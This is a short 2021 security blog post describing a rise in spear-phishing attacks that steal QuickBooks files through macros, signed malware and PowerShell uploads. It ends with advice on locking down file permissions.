Thursday 25th February 2021

BLOG: Increase in QuickBooks Data Spear-Phishing Attacks

Research has now led to a discovery of a significant surge in QuickBooks file data theft using social engineering tricks to distribute the malware and exploit the accounting software. QuickBooks is an accounting software package developed and marketed by Intuit. 

The attack has frequently involved the basic malware that is often signed, as a result, this makes the malware harder to detect using antivirus or other threat protection software. The spear-phishing attacks take the form of a PowerShell command that has the ability to operate inside of the email, researchers said adding a second attack vector involves inducement documents sent via email messages that run a macro to download malicious code which uploads QuickBooks files to an attacker-controlled server when opened by the user. 

Subsequently, threat actors have also been spotted running a PowerShell command called Invoke-WebRequests on target systems to upload relevant data to the Internet without the need for downloading specialised malware. 

Researchers found that once users have access to the Quickbooks database, a piece of malware or corrupted PowerShell is able to read the user’s file from the file server regardless of whether they are an administrator or not. 

Furthermore, the attack surface increases exponentially in the event QuickBooks file permissions are set to the “Everyone” group, as an attacker can target any individual in the company, as opposed to a specific person with the right privileges. 

Despite the stolen data being sold and distributed on the dark web, there have been instances that the coordinator behind the attacks has utilised bait-and-switch tactics to lure customers into making fraudulent bank transfers by posing as suppliers or partners. 

Users need to stay vigilant and aware of these attacks and ensure file permissions are not set to the “Everyone” group to limit exposure and to check that if you are using a Database Server Manager, be sure to check the permissions after running a database repair and confirm they are locked down. 

Get our latest cyber intelligence insights straight into your inbox

Fill out the short form below to subscribe to our newsletter so that you never miss out on our cyber intelligence insights and news.